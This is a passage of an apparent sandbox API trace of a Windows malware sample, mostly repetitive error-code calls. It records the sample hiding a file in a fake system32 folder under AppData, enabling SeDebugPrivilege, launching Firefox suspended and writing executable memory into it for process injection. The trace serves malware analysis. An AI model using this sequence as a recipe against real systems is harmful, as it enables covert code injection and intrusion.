(dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.512] SetLastError (dwErrCode=0x0) [0041.512] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.513] SetLastError (dwErrCode=0x0) [0041.513] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.514] GetLastError () returned 0x0 [0041.514] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.515] GetLastError () returned 0x0 [0041.515] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.516] GetLastError () returned 0x0 [0041.516] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.517] GetLastError () returned 0x0 [0041.517] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.518] SetLastError (dwErrCode=0x0) [0041.518] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.519] SetLastError (dwErrCode=0x0) [0041.519] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.520] SetLastError (dwErrCode=0x0) [0041.520] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.521] GetLastError () returned 0x0 [0041.521] SetLastError (dwErrCode=0x0) [0041.832] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da9c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0041.833] GetFileType (hFile=0xac) returned 0x1 [0041.833] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0041.833] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0041.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0xe6972ab0, dwHighDateTime=0x1d3dfba)) [0041.833] GetLastError () returned 0x0 [0041.833] SetLastError (dwErrCode=0x0) [0041.833] GetLastError () returned 0x0 [0041.833] SetLastError (dwErrCode=0x0) [0041.833] GetLastError () returned 0x0 [0041.833] SetLastError (dwErrCode=0x0) [0041.833] GetLastError () returned 0x0 [0041.833] SetLastError (dwErrCode=0x0) [0041.834] GetLastError () returned 0x0 [0041.834] SetLastError (dwErrCode=0x0) [0041.834] GetTimeZoneInformation (in: lpTimeZoneInformation=0x72f1d8e8 | out: lpTimeZoneInformation=0x72f1d8e8) returned 0x2 [0041.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Greenland Standard Time", cchWideChar=-1, lpMultiByteStr=0x72f18d68, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x172db38 | out: lpMultiByteStr="Greenland Standard Time", lpUsedDefaultChar=0x172db38) returned 24 [0041.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Greenland Daylight Time", cchWideChar=-1, lpMultiByteStr=0x72f18da8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x172db38 | out: lpMultiByteStr="Greenland Daylight Time", lpUsedDefaultChar=0x172db38) returned 24 [0041.841] GetLastError () returned 0x0 [0041.841] SetLastError (dwErrCode=0x0) [0041.841] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x172dab0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172dab0*=0) returned 0x0 [0041.841] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0041.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0xe6998c10, dwHighDateTime=0x1d3dfba)) [0041.841] GetLastError () returned 0x0 [0041.841] SetLastError (dwErrCode=0x0) [0041.841] GetLastError () returned 0x0 [0041.841] SetLastError (dwErrCode=0x0) [0041.842] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0041.842] GetLastError () returned 0x0 [0041.842] SetLastError (dwErrCode=0x0) [0041.842] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c010*=0) returned 0x0 [0041.842] WriteFile (in: hFile=0xac, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x172c048, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172c048*=0x42, lpOverlapped=0x0) returned 1 [0041.843] CloseHandle (hObject=0xac) returned 1 [0041.844] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0041.845] SetFileTime (hFile=0xac, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0041.845] CloseHandle (hObject=0xac) returned 1 [0041.845] Sleep (dwMilliseconds=0x68fb0) [0051.994] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0051.994] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0051.995] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0051.995] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x77720000 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="realloc") returned 0x7772b10d [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="sprintf") returned 0x7773d354 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="srand") returned 0x7772f757 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="rand") returned 0x7772c070 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0051.995] GetProcAddress (hModule=0x77720000, lpProcName="_vsnprintf") returned 0x7772d1a8 [0051.996] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0051.996] GetProcAddress (hModule=0x77720000, lpProcName="strtok") returned 0x7772df1f [0051.996] GetProcAddress (hModule=0x77720000, lpProcName="strcmp") returned 0x77738b11 [0051.996] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0051.996] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="CreateNamedPipeW") returned 0x7620270f [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileW") returned 0x7621cc56 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="SetNamedPipeHandleState") returned 0x7622f420 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="SetEvent") returned 0x7621bccc [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetOverlappedResult") returned 0x76212f04 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="ConnectNamedPipe") returned 0x76202727 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0051.996] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="FlushFileBuffers") returned 0x76207f81 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="DisconnectNamedPipe") returned 0x7622f438 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="OpenEventW") returned 0x7621548b [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="ResetEvent") returned 0x7621bcb4 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemTime") returned 0x7621ced8 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="ExitProcess") returned 0x7622214f [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="SetLastError") returned 0x7621bb08 [0051.997] GetProcAddress (hModule=0x761d0000, lpProcName="OutputDebugStringA") returned 0x7620eb36 [0051.997] LoadLibraryW (lpLibFileName="WinInet.dll") returned 0x76600000 [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestExA") returned 0x76691812 [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="HttpQueryInfoA") returned 0x7661a33e [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="InternetConnectA") returned 0x766249e9 [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="InternetReadFile") returned 0x7661b406 [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="InternetWriteFile") returned 0x766346da [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="HttpOpenRequestA") returned 0x76624c7d [0052.002] GetProcAddress (hModule=0x76600000, lpProcName="HttpEndRequestA") returned 0x766345ea [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="HttpAddRequestHeadersA") returned 0x7661dcd2 [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestA") returned 0x766918f8 [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="InternetOpenA") returned 0x7662f18e [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="InternetCloseHandle") returned 0x7661ab49 [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="InternetQueryOptionA") returned 0x76611b56 [0052.003] GetProcAddress (hModule=0x76600000, lpProcName="InternetSetOptionA") returned 0x766175e8 [0052.003] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x77830000 [0052.003] GetProcAddress (hModule=0x77830000, lpProcName="ObtainUserAgentString") returned 0x77861d76 [0052.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172fd04 | out: lpSystemTimeAsFileTime=0x172fd04*(dwLowDateTime=0xeca72b30, dwHighDateTime=0x1d3dfba)) [0052.134] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da98, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0052.134] GetFileType (hFile=0x118) returned 0x1 [0052.134] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0052.134] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0052.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc4 | out: lpSystemTimeAsFileTime=0x172dbc4*(dwLowDateTime=0xeca98c90, dwHighDateTime=0x1d3dfba)) [0052.135] GetLastError () returned 0xb7 [0052.135] SetLastError (dwErrCode=0xb7) [0052.135] GetLastError () returned 0xb7 [0052.135] SetLastError (dwErrCode=0xb7) [0052.135] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x172daac*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172daac*=0) returned 0x42 [0052.135] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0052.135] GetLastError () returned 0xb7 [0052.135] SetLastError (dwErrCode=0xb7) [0052.135] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c00c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c00c*=0) returned 0x42 [0052.135] WriteFile (in: hFile=0x118, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x172c044, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172c044*=0x4c, lpOverlapped=0x0) returned 1 [0052.136] CloseHandle (hObject=0x118) returned 1 [0052.136] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0052.137] SetFileTime (hFile=0x118, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0052.137] CloseHandle (hObject=0x118) returned 1 [0052.137] GetLastError () returned 0x0 [0052.137] GetLastError () returned 0x0 [0052.137] GetLastError () returned 0x0 [0052.137] GetLastError () returned 0x0 [0052.137] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76700000 [0052.137] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0052.137] GetProcAddress (hModule=0x76700000, lpProcName="RegQueryValueExA") returned 0x767148ef [0052.137] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0052.137] wsprintfA (in: param_1=0x172bd9c, param_2="%s\\shell\\open\\command" | out: param_1="http\\shell\\open\\command") returned 23 [0052.138] RegCreateKeyExA (in: hKey=0x80000000, lpSubKey="http\\shell\\open\\command", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x172bc70, lpdwDisposition=0x172bc90 | out: phkResult=0x172bc70*=0x11e, lpdwDisposition=0x172bc90*=0x2) returned 0x0 [0052.138] RegQueryValueExA (in: hKey=0x11e, lpValueName=0x0, lpReserved=0x0, lpType=0x172bc94, lpData=0x172bc98, lpcbData=0x172bc68*=0x104 | out: lpType=0x172bc94*=0x1, lpData="\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\"", lpcbData=0x172bc68*=0x40) returned 0x0 [0052.138] RegCloseKey (hKey=0x11e) returned 0x0 [0052.138] lstrlenA (lpString=".exe") returned 4 [0052.138] _snwprintf (in: _Dest=0x172c2f8, _Count=0x104, _Format="%S" | out: _Dest="c:\\program files\\mozilla firefox\\firefox.exe") returned 44 [0052.138] GetComputerNameW (in: lpBuffer=0x172bc88, nSize=0x172bc78 | out: lpBuffer="CRH2YWU7", nSize=0x172bc78) returned 1 [0052.138] _snwprintf (in: _Dest=0x172c0f0, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0052.138] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="c41b2305") returned 0x11c [0052.138] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0052.138] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x77c70000 [0052.160] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76700000 [0052.160] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0052.160] GetProcAddress (hModule=0x761d0000, lpProcName="CreateRemoteThread") returned 0x7625f33b [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="WriteProcessMemory") returned 0x7620c1de [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="OpenProcess") returned 0x762159d7 [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="ReadProcessMemory") returned 0x7620c1ce [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualAllocEx") returned 0x7620c1b6 [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualFreeEx") returned 0x7620c1ee [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0052.161] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0052.161] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModules") returned 0x77c71408 [0052.161] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModulesEx") returned 0x77c715de [0052.161] GetProcAddress (hModule=0x77c70000, lpProcName="GetModuleBaseNameW") returned 0x77c7152c [0052.162] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcesses") returned 0x77c71544 [0052.162] GetProcAddress (hModule=0x76700000, lpProcName="LookupPrivilegeValueW") returned 0x767141b3 [0052.162] GetProcAddress (hModule=0x76700000, lpProcName="OpenProcessToken") returned 0x76714304 [0052.162] GetProcAddress (hModule=0x76700000, lpProcName="AdjustTokenPrivileges") returned 0x7671418e [0052.162] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x172be68 | out: lpLuid=0x172be68*(LowPart=0x14, HighPart=0)) returned 1 [0052.163] GetCurrentProcess () returned 0xffffffff [0052.163] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x172be74 | out: TokenHandle=0x172be74*=0x128) returned 1 [0052.163] AdjustTokenPrivileges (in: TokenHandle=0x128, DisableAllPrivileges=0, NewState=0x172be64*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0052.163] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0052.163] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0052.182] CreateProcessW (in: lpApplicationName="c:\\program files\\mozilla firefox\\firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172bfa0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x172bf44 | out: lpCommandLine=0x0, lpProcessInformation=0x172bf44*(hProcess=0x130, hThread=0x12c, dwProcessId=0xed8, dwThreadId=0xedc)) returned 1 [0052.203] GetLastError () returned 0x0 [0052.203] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0xed8) returned 0x138 [0052.203] VirtualAllocEx (hProcess=0x138, lpAddress=0x0, dwSize=0x380c, flAllocationType=0x1000, flProtect=0x4) returned 0x50000 [0052.203] VirtualProtectEx (in: hProcess=0x138, lpAddress=0x50000, dwSize=0x380c, flNewProtect=0x40, lpflOldProtect=0x172be70 | out: lpflOldProtect=0x172be70*=0x4) returned 1 [0052.204] WriteProcessMemory (in: hProcess=0x138, lpBaseAddress=0x50000, lpBuffer=0x172c500*, nSize=0x380c, lpNumberOfBytesWritten=0x172be6c | out: lpBuffer=0x172c500*, 